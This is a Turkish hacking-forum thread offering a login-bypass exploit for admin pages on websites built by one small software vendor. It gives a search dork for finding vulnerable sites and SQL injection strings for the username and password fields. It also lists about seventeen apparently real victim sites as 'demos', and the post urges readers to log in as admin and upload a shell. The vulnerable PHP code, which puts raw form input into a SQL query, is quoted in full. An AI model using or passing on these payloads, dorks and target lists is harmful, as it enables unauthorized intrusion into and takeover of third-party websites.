Konuyu Oyla:
  • Derecelendirme: 0/5 - 0 oy
  • 1
  • 2
  • 3
  • 4
  • 5
Developed by Madss Software Solution Login page Bypass Acıgı
#1
Selamunaleykum farklı bir scpritde tespit edilen bypass acıgı admin girişi yapıp shelinizi yukluyebilirsin.





# Exploit Title : Developed by Madss Software Solution Login page Bypass Acıgı
# Exploit Author :RedCyberizm
# Vendor Homepage : http://madsssoftwaresolution.com
# Tested on: Windows 7 , Linux
# Google Dork : intext:"Developed by Madss Software Solution Pvt. Ltd."
# Date: 2014/4/13



# Exploit : Login page bypass
#
# Location : [Target]/admin/login.php
#
# Username : '=' 'or'
#
# Password : '=' 'or'


Demolar:
# http://www.artistXmahendradubey.com/admin/login.php
#
# http://www.sardXarenterprises.com/admin/login.php
#
# http://www.amXritaorganic.com/admin/login.php
#
# http://www.kvmXcpandhana.com/admin/login.php
#
# http://www.vikatsXoft.com/admin/login.php
#
# http://www.narulaXmathsmagic.com/admin/login.php
#
# http://www.dayodayXathirthborgaon.com/admin/login.php
#
# http://www.chhatimaXta.com/admin/login.php
#
# http://www.chhatimatXa.com/admin/login.php
#
# http://www.mnlawcolleXgekhandwa.com/admin/login.php
#
# http://www.guptaXshrikhandwa.com/admin/login.php
#
# http://www.apnagwXalior.com/admin/login.php
#
# http://www.apnamorXena.com/admin/login.php
#
# http://www.djpsbhikanXgaon.com/admin/login.php
#
# http://www.acmecoachiXngbhikangaon.com/admin/login.php
#
# http://www.sainisportsacCademy.com/admin/login.php
#
# http://www.apnaburhanpuXr.com/admin/login.php


Acıkgın tespiti ve hatalı oldugu yer

PHP Kod:
<?php
session_start
();
error_reporting(0);
include(
"config.php");

/*if(isset($_SESSION["session_nickname"]) && $_SESSION["session_nickname"]!="")
{
header("location:admin_home.php");
}*/
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Admin Login</title>
<link href="css/login.css" rel="stylesheet" type="text/css" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" /></head>
<body>
<br />

<a href="../xlexcicalx.php" style="margin-left:850px; color:#F00">Logout
completelly</a>
<div id="logincontainer">
<h1>Administrator</h1>
<div id="loginbox">
<?php
if(isset($_POST['submit']))
{
$sql=mysql_query("select * from tbl_admin where username='".$_POST['username']."' and
password='"
.$_POST['password']."' and type='admin'") or die(mysql_error());

if(
mysql_num_rows($sql)>0)
{
$_SESSION["session_nickname"]=$_POST['username'];
$_SESSION["type"]='admin';
?>

<script type="text/javascript"> window.location.href="admin_home.php";</script>
<?php 
}
else
{
$mass="Invalid user name or password. ";
}

?>
<tr>
<td colspan="3" align="center"><strong style="color:#FF0000"><?php echo
$mass?></strong></td>
</tr>
<?php
}
?>
<form method="post" />
<div class="inputcontainer">
<img src="./images/icons/icon_username.png" alt="Username" />
<label for="username">Username:</label>
<input type="text" id="username" name="username" />
</div>
<div class="inputcontainer">
<img src="./images/icons/icon_locked.png" alt="Password" />
<label for="password">Password:</label>
<input type="password" id="password" name="password" />
</div>
<input type="submit" name="submit" value="Login"
class="loginsubmit" />
<p><a href="forget_password.php">Forgotten password</a></p>
</form>
</div>
</div>
</body>
</html> 
Beğenenler:
#2
eline saglık.
Beğenenler:

Konu ile Alakalı Benzer Konular
Konular Yazar Yorumlar Okunma Son Yorum
  Wordpress "Js Support Ticket" File Upload Bypass Extensions Mr.F92 16 522 7 saat önce
Son Yorum: Slowycan
  Natural Software CMS Yönetici Atlatma Açığı KingSkrupellos 7 123 30-11-2016, Saat: 02:56
Son Yorum: 0xfans
  Developed By IT Look Admin Sayfası Atlatma Açığı KingSkrupellos 8 145 25-11-2016, Saat: 23:50
Son Yorum: zheeshorn
  WordPress store theme Upload Acıgı archavin 72 4,748 24-11-2016, Saat: 17:33
Son Yorum: Mrxxx
  Labdhi Business Solution Yönetici Atlatma Güvenlik Açığı KingSkrupellos 3 92 23-11-2016, Saat: 22:59
Son Yorum: Efetimi
Anahtar Kelimeler

Developed by Madss Software Solution Login page Bypass Acıgı indir, Developed by Madss Software Solution Login page Bypass Acıgı Videosu, Developed by Madss Software Solution Login page Bypass Acıgı Online izle, Developed by Madss Software Solution Login page Bypass Acıgı Bedava indir, Developed by Madss Software Solution Login page Bypass Acıgı Yükle, Developed by Madss Software Solution Login page Bypass Acıgı Hakkında, Developed by Madss Software Solution Login page Bypass Acıgı Nedir, Developed by Madss Software Solution Login page Bypass Acıgı Free indir, Developed by Madss Software Solution Login page Bypass Acıgı Oyunu, Developed by Madss Software Solution Login page Bypass Acıgı Download


1 Ziyaretçi